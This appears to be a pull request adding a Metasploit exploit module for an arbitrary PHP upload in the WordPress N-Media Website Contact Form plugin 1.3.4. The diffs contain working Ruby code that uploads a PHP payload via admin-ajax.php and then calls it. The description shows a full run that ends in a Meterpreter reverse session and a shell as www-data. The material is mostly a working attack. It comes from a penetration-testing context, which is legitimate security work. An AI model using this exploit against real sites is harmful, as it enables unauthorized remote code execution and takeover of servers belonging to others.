### PR TITLE
Add Module WP N-Media Website File Upload

### DIFF
--- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
     post_data = data.to_s
 
     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
+      'uri'       => wordpress_url_admin_ajax,
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data

--- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.3.4')
+    check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.4')
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
@@ -67,7 +67,11 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res && res.code == 200 && res.body =~ /filename/
-      new_php_pagename = JSON.parse(res.body)["filename"]
+      begin
+        new_php_pagename = JSON.parse(res.body)["filename"]
+      rescue JSON::ParserError
+        new_php_pagename = ''
+      end
       print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...")
       register_files_for_cleanup(new_php_pagename)
     else

--- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
@@ -1,0 +1,81 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress N-Media Website Contact Form Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form
+        plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'TO DO', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://domain.test']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['N-Media WebSite Contact Form 1.3.4', {}]],
+      'DisclosureDate' => 'Mar 14 2015',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'    => normalize_uri(wordpress_url_plugins, 'website-contact-form-with-file-upload', 'readme.txt')
+    )
+
+    if res && res.code == 200 && res.body =~ /N-Media Website Contact Form/
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'
+
+    data = Rex::MIME::Message.new
+    data.add_part('upload', nil, nil, 'form-data; name="action"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"")
+    data.add_part('nm_webcontact_upload_file', nil, nil, 'form-data; name="action"')
+    post_data = data.to_s
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
+      'method'    => 'POST',
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => post_data
+    })
+
+    if res && res.code == 200 && res.body =~ /filename/
+      new_php_pagename = JSON.parse(res.body)["filename"]
+      print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...")
+      register_files_for_cleanup(new_php_pagename)
+    else
+      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+    end
+
+    print_status("#{peer} - Calling payload...")
+    send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename)
+    }, 2)
+  end
+end

--- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
@@ -39,15 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_cgi(
-      'uri'    => normalize_uri(wordpress_url_plugins, 'website-contact-form-with-file-upload', 'readme.txt')
-    )
-
-    if res && res.code == 200 && res.body =~ /N-Media Website Contact Form/
-      return Exploit::CheckCode::Detected
-    end
-
-    Exploit::CheckCode::Safe
+    check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.3.4')
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
@@ -58,16 +58,20 @@ class Metasploit3 < Msf::Exploit::Remote
       'data'      => post_data
     })
 
-    if res && res.code == 200 && res.body =~ /filename/
-      begin
-        new_php_pagename = JSON.parse(res.body)["filename"]
-      rescue JSON::ParserError
-        new_php_pagename = ''
+    if res
+      if res.code == 200 && res.body =~ /filename/
+        begin
+          new_php_pagename = JSON.parse(res.body)["filename"]
+        rescue JSON::ParserError
+          new_php_pagename = ''
+        end
+        print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...")
+        register_files_for_cleanup(new_php_pagename)
+      else
+        fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
       end
-      print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...")
-      register_files_for_cleanup(new_php_pagename)
     else
-      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+      fail_with('ERROR')
     end
 
     print_status("#{peer} - Calling payload...")

--- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
@@ -79,8 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_status("#{peer} - Calling payload...")
-    send_request_cgi({
+    send_request_cgi(
       'uri'       => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename)
-    }, 2)
+    )
   end
 end

--- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.4')
+    check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.5')
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb
@@ -20,19 +20,20 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'TO DO', # Vulnerability discovery
+          'Claudio Viviani', # Vulnerability discovery
           'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['URL', 'http://domain.test']
+          ['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'],
+          ['WPVDB', '7896']
         ],
       'Privileged'     => false,
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
       'Targets'        => [['N-Media WebSite Contact Form 1.3.4', {}]],
-      'DisclosureDate' => 'Mar 14 2015',
+      'DisclosureDate' => 'Apr 12 2015',
       'DefaultTarget'  => 0)
     )
   end


### PR DESCRIPTION
#### Add WordPress N-Media Website Contact Form 1.3.4 Shell Upload.

  Application: WordPress N-Media Website Contact Form
  Homepage: https://wordpress.org/plugins/website-contact-form-with-file-upload
  Source Code: https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
  Active Installs (wordpress.org): 1,000+
  References: https://wpvulndb.com/vulnerabilities/7896
#### Vulnerable packages*

  1.3.4
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use exploit/unix/webapp/wp_nmediawebsite_file_upload 
msf exploit(wp_nmediawebsite_file_upload) > show options 

Module options (exploit/unix/webapp/wp_nmediawebsite_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   N-Media WebSite Contact Form 1.3.4


msf exploit(wp_nmediawebsite_file_upload) > info

       Name: Wordpress N-Media Website Contact Form Upload Vulnerability
     Module: exploit/unix/webapp/wp_nmediawebsite_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-04-12

Provided by:
  Claudio Viviani
  Roberto Soares Espreto <robertoespreto@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   N-Media WebSite Contact Form 1.3.4

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress 
  N-Media Website Contact Form plugin, version 1.3.4. The 
  vulnerability allows for arbitrary file upload and remote code 
  execution.

References:
  http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/
  https://wpvulndb.com/vulnerabilities/7896

msf exploit(wp_nmediawebsite_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_nmediawebsite_file_upload) > exploit 

[*] Started reverse handler on 192.168.1.46:4444 
[+] 192.168.1.31:80 - Our payload is at: 1428976681-oevRlIo.php. Calling payload...
[*] 192.168.1.31:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:40674) at 2015-04-13 22:57:39 -0300
[+] Deleted 1428976681-oevRlIo.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 25091 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```
